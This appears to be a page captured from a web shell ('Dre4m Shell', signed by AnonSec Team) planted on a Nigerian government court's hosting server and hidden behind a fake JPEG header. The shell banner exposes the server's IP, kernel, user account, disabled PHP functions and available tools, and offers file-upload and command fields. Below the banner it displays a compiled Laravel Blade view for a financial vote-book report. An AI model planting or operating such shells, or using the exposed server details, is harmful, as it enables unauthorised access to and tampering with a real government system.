ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 18.218.45.1
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/funds.upgrade.nicn.gov.ng/funds-upgraded/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/funds.upgrade.nicn.gov.ng/funds-upgraded/storage/framework/views/2875c4d64d5846479911049f69d540a7d2c79153.php
<?php $__env->startSection('pageTitle'); ?>
  
<?php $__env->stopSection(); ?>
<?php $__env->startSection('content'); ?>


<div class="box box-default">
  <div class="box-body box-profile">
    <div class="box-header with-border">
      <h3 class="box-title"><?php echo $__env->yieldContent('pageTitle'); ?> <span id='processing'></span></h3>
    </div>
     <div class="box-body">
     
     <?php echo $__env->make('layouts.allReportHeader', ['companyName'=>'defaultName', 'companyAddress'=>'defaultAddress', 'title1'=>'Vote Report', 'title2'=>'', 'showOnlyTitle1'=>1, 'showOnlyTitle2'=>0, 'hideLogos'=>0, 'hideAddress'=>0], \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?> 
    
    <div class="box-body">
      <div class="row">
        <div class="col-md-12"><!--1st col--> 
                    <?php if($warning<>''): ?>
                      <div class="alert alert-dismissible alert-danger">
                      <button type="button" class="close" data-dismiss="alert">&times;</button>
                      <strong><?php echo e($warning); ?></strong> 
                      </div>
                      <?php endif; ?>
                      <?php if($success<>''): ?>
                      <div class="alert alert-dismissible alert-success">
                      <button type="button" class="close" data-dismiss="alert">&times;</button>
                      <strong><?php echo e($success); ?></strong> 
                      </div>
                      <?php endif; ?>
                      <?php if(count($errors) > 0): ?>
                    <div class="alert alert-danger alert-dismissible" role="alert">
                        <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
                        </button>
                        <strong>Error!</strong> 
                        <?php $__currentLoopData = $errors->all(); $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $error): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                            <p><?php echo e($error); ?></p>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                    </div>
                <?php endif; ?>

                   
        
        <form class="form-horizontal hidden-print" role="form" id="thisform1" name="thisform1" method="post">
        <?php echo e(csrf_field()); ?>

<div class="row hidden-print">
	<div class="col-md-12">
		<div class="form-group">
			<div class="col-md-3">
			</div>
			<div class="col-md-2">
			
			<label>Period</label>
			<select name="period" id="period" class="form-control" onchange ="ReloadForm();" >
			<option value="" selected>-Select Year-</option>
			<?php $__currentLoopData = $YearPeriod; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $b): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
			<option value="<?php echo e($b->Period); ?>" <?php echo e(($period) == $b->Period? "selected":""); ?>><?php echo e($b->Period); ?></option>
			<?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> 
			</select>
			</div>
			<div class="col-md-2">          
		                <label class="control-label">Date From</label>
		                <input type="text" class="col-sm-9 form-control" value="<?php echo e($fromdate); ?>" name="fromdate" id="fromdate">
		    </div>
			<div class="col-md-2">          
				<label class="control-label">Date To</label>
				<input type="text" class="col-sm-9 form-control" value="<?php echo e($todate); ?>" name="todate" id="todate">
			</div>
			<div class="col-md-3"></div>
		</div>
		
		
		<div class="form-group">
			<div class="col-md-3">
			<label>Allocation Source</label>
			<select name="allocationsource" id="allocationsource" class="form-control" onchange ="ReloadForm();">
			<option value="" selected>-All-</option>
			<?php $__currentLoopData = $AllocationSource; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $b): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
			<option value="<?php echo e($b->ID); ?>" <?php echo e(($allocationsource) == $b->ID? "selected":""); ?>><?php echo e($b->allocation); ?></option>
			<?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> 
			</select>
			</div>
			<div class="col-md-3">
			<label>Budget Type</label>
			<select name="budgettype" id="budgettype" class="form-control" onchange ="ReloadForm();">
			<option value="" selected>-All-</option>
			<?php $__currentLoopData = $BudgetType; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $b): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
			<option value="<?php echo e($b->ID); ?>" <?php echo e(($budgettype) == $b->ID? "selected":""); ?>><?php echo e($b->contractType); ?></option>
			<?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> 
			</select>
			</div>
			<div class="col-md-3">
			<label>Economic Head</label>
			<select name="economichead" id="economichead" class="form-control" onchange ="ReloadForm();">
			<option value="" selected>-All-</option>
			<?php $__currentLoopData = $EconomicHead; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $b): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
			<option value="<?php echo e($b->ID); ?>" <?php echo e(($economichead) == $b->ID? "selected":""); ?>><?php echo e($b->economicHead); ?></option>
			<?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> 
			</select>
			</div> 
			<div class="col-md-3">
			<label>Economic Codes</label>
			<select name="economiccode" id="economiccode" class="form-control" onchange ="ReloadForm();">
			<option value="" selected>-All-</option>
			<?php $__currentLoopData = $EconomicCode; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $b): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
			<option value="<?php echo e($b->ID); ?>" <?php echo e(($economiccode) == $b->ID? "selected":""); ?>><?php echo e($b->economicCode); ?>|<?php echo e($b->description); ?></option>
			<?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> 
			</select>
			</div>            		
		</div>
	            	 
		</div>
		<div class="col-md-12">
			<div class="form-group">

                <br>
                <label class="control-label"></label>
                <button type="submit" class="btn btn-success" name="add">
                    <i class="fab fa-btn fa-sistrix"></i> Search
                </button>         
            
			</div>
        </div>
	</div>
</form>

          	
		<div class="table-responsive" style="font-size: 12px; padding:10px;">
			<table class="table table-bordered">
			<thead>
				<tr >
			                
			               	<th >Line No</th>
			                <th >Date</th>	
			                <th >Voucher No</th>	             
			                <th >Particular</th>
			                <th >Payment</th>
			                <th >Total</th>
			                <th >Balance</th>	
			                <th >Liab Ref</th>
			                <th >Incurred</th>	
			                <th >Cleared</th>	             
			                <th >Total Outstanding</th>
			                <th >Remarks</th>
			                <th >Balance Available</th>
			               	         			
			 	</tr>
			</thead>
						<?php $serialNum = 1; ?>
						<?php $__currentLoopData = $VoteBookRecord; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $b): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
							<tr>
								<td></td>
								<td><?php echo e($b->trandate); ?></td>
								<td><?php echo e($b->refNo); ?></td>
								<td><?php echo e($b->particular); ?></td>
								<td class="align"><?php if($b->payment==0): ?><?php echo e($b->payment); ?><?php else: ?><?php echo e(number_format($b->payment,2)); ?><?php endif; ?></td>
								<td class="align"><?php if($b->total==0): ?><?php echo e($b->total); ?><?php else: ?><?php echo e(number_format($b->total,2)); ?><?php endif; ?></td>
								<td class="align"><?php if($b->balance==0): ?><?php echo e($b->balance); ?><?php else: ?><?php echo e(number_format($b->balance,2)); ?><?php endif; ?></td>
								<td><?php echo e($b->liaref); ?></td>
								<td class="align"><?php if($b->incurred==0): ?><?php echo e($b->incurred); ?><?php else: ?><?php echo e(number_format($b->incurred,2)); ?><?php endif; ?></td>
								<td class="align"><?php if($b->cleared==0): ?><?php echo e($b->cleared); ?><?php else: ?><?php echo e(number_format($b->cleared,2)); ?><?php endif; ?></td>
								<td class="align"><?php if($b->liatotaloutstanding==0): ?><?php echo e($b->liatotaloutstanding); ?><?php else: ?><?php echo e(number_format($b->liatotaloutstanding,2)); ?> <?php endif; ?></td>
								<td><?php echo e($b->remark); ?></td>
								<td class="align"><?php echo e(number_format($b->availablebal,2)); ?></td>
								
							</tr>
							
						
			
						<?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>		
			 </table>
			 <button class="print hidden-print" type="submit" >Print</button>
		</div>
          
          <hr />
        </div>
       
  </div>
</div>




<?php $__env->stopSection(); ?>

<?php $__env->startSection('styles'); ?>
<style type="text/css">
    .modal-dialog {
width:15cm
}

.modal-header {

background-color: #20b56d;

color:#FFF;

}
@media  print{
.hidden-print{display:none!important}
 .dt-buttons, .dataTables_info, .dataTables_paginate, .dataTables_filter
{
display:none!important
}
}

</style>
<?php $__env->stopSection(); ?>

<?php $__env->startSection('scripts'); ?>
<link rel="stylesheet" type="text/css" href="<?php echo e(asset('assets/css/datepicker.min.css')); ?>">
<link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/1.10.19/css/jquery.dataTables.min.css">
<link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/buttons/1.5.2/css/buttons.dataTables.min.css">

<script src="<?php echo e(asset('assets/js/jquery-ui.min.js')); ?>"></script>

<script src="https://cdn.datatables.net/1.10.19/js/jquery.dataTables.min.js"></script>
<script src="https://cdn.datatables.net/buttons/1.5.2/js/dataTables.buttons.min.js"></script>
<script src="https://cdn.datatables.net/buttons/1.5.2/js/buttons.print.min.js"></script>

<script>


  function  ReloadForm()
  { 
  document.getElementById('thisform1').submit();
  return;
  }

  


 $( function(){
   $("#fromdate").datepicker({changeMonth: true,changeYear: true,dateFormat: 'yy-mm-dd'});
   $("#todate").datepicker({changeMonth: true,changeYear: true,dateFormat: 'yy-mm-dd'});
    });

  $(document).ready(function() {
    $('#').DataTable();
  } );

  $(document).ready(function() {
      $('#mytable').DataTable( {
          dom: 'Bfrtip',
          buttons: [
              {
                  extend: 'print',
                  customize: function ( win ) {
                      $(win.document.body)
                          .css( 'font-size', '10pt' )
                          .prepend(
                              ''
                          );
   
                      $(win.document.body).find( 'table' )
                          .addClass( 'compact' )
                          .css( 'font-size', 'inherit' );
                  }
              }
          ]
      } );
  } );


</script>


<?php $__env->stopSection(); ?>

<?php echo $__env->make('layouts.layout', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/nicngo5/funds.upgrade.nicn.gov.ng/funds-upgraded/resources/views/Report/votebookrecord.blade.php ENDPATH**/ ?>

Anon7 - 2022
AnonSec Team